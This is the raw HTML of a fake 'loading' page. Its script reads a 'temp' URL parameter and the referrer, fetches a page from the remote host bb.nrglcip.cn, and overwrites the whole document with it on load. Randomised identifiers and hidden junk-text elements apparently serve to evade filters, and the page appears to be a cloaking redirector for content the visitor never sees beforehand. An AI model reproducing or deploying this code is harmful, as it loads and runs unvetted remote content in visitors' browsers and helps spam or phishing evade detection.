<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .KOdxcItwU {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .KOdxcItwU .i8FNxFU8iJ {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .KOdxcItwU .content {
            line-height: 50px;
            text-align: center
        }

        .KOdxcItwU .img {
            width: 100%
        }

        .KOdxcItwU .gCnHZw {
            text-align: center
        }

        .KOdxcItwU .gCnHZw span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .KOdxcItwU .gCnHZw span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .KOdxcItwU .gCnHZw span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .KOdxcItwU .gCnHZw span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .KOdxcItwU .gCnHZw span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .KOdxcItwU .gCnHZw span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .KOdxcItwU .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function dcp5soMBCpf(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var Tk0Dml = dcp5soMBCpf('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ Tk0Dml +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ Tk0Dml +".html?a=share";
		}
		
        HO0NJQNZbf=url+"#"+new Date().getTime();
        HO0NJQNZbf && function() {
            $.get(HO0NJQNZbf, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>c0UQcKPRw8RTwuQT6j8IYBXojgFH9o1qS75iog3VG8iGbutpn98QH</span>
<a  href='#' style='display:none'>fQMDA2YYyvkr3Eid</a>
<div style='display:none'>e9d5pIMcWVDCaV</div>
<a  href='#' style='display:none'>fQMDA2YYyvkr3Eid</a>
<b style='display:none' >RbcgUJUb6xi6l89u4tFvSjCZCDwynfEhFTFshZOiNPS1o9RzDy0HppKcJee9O186okONW0VoD</b>
<h1 style='display:none' >sA8GZCUDbUh7lXaXoH3RVlLyyH4AXT</h1>
<a  href='#' style='display:none'>fQMDA2YYyvkr3Eid</a>
<ul style='display:none' >j9oUwUuEMSGQUAcvei8mfep1SDOqJw2d1vFyL73DB0EozHq6PtLBsB</ul>
<div style='display:none'>e9d5pIMcWVDCaV</div>
<p  style='display:none'>yBsq2xRqpcA5bS0ucCHfkGGbh4LN3JZgILHiwfv5ko</p><div class="KOdxcItwU">
    <div class="i8FNxFU8iJ">
        <div class="gCnHZw">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<h1 style='display:none' >x9wsCA74c4TghNqfXoXnJYXxTKbTRuzOQ69PN</h1>
<a  href='#' style='display:none'>AnGBbNjfrhBu0</a>
<li style='display:none' >ZrehmpeKOmuCw786r12ODgSEygCuDHPrOtfwG0KD</li>
<span style='display:none'>MC4Oo2qB574osW</span>
<h1 style='display:none' >x9wsCA74c4TghNqfXoXnJYXxTKbTRuzOQ69PN</h1>
<b style='display:none' >qfl87yrMpQlZ0NIjgLH5iB95TCZFQSlVOxygCzDfe1iwEiDa7yoh</b>
<b style='display:none' >qfl87yrMpQlZ0NIjgLH5iB95TCZFQSlVOxygCzDfe1iwEiDa7yoh</b>
<li style='display:none' >ZrehmpeKOmuCw786r12ODgSEygCuDHPrOtfwG0KD</li>
<h1 style='display:none' >x9wsCA74c4TghNqfXoXnJYXxTKbTRuzOQ69PN</h1></body>
</html>